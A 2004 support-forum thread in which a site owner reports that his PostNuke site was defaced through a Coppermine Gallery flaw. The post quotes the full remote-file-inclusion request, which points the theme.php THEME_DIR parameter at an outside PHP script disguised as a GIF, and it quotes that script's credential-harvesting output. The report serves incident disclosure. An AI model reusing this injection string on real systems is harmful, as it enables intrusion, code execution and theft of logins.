News:

CPG Release 1.6.29
During HTML5 upload, keep pseudo blank code 200 messages from triggering error condition
added Russian language
correct failure to use theme menu icons in album manager
minor vulnerabilities mitigation

Main Menu

PostNuke Coppermine Gallery Security Error

Started by PsyVision, October 12, 2004, 01:35:33 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

PsyVision

October 12, 2004, 01:35:33 PM Last Edit: October 13, 2004, 12:20:18 AM by GauGau
hey,

I run a website www.dustify.net. Last night someone has used coppermine to execute a php script to deface the front page of the website by accessing the postnuke username/password.

"http://www.dustify.net/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.webfontes.com.br/priv8/cmd.gif?&nick=MaMa&op=coppermine"

is the request that was put through our webserver. The error is in "http://www.dustify.net/modules/coppermine/themes/default/theme.php" and the file "http://www.webfontes.com.br/priv8/cmd.gif" is not an image, it contains PHP code to break into several security flaws in several image galleries.

The result of executing the script is:

"Possível Login cPanel: **** Possível Senha: ****
Admins:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in http://www.webfontes.com.br/priv8/cmd.gif?/user_list_info_box.inc on line 251

Site Ownado!"

Has anyone else had this problem?

Tranz

#1
October 12, 2004, 04:42:41 PM Last Edit: October 12, 2004, 04:48:36 PM by TranzNDance
Print
Go Up Pages1
User actions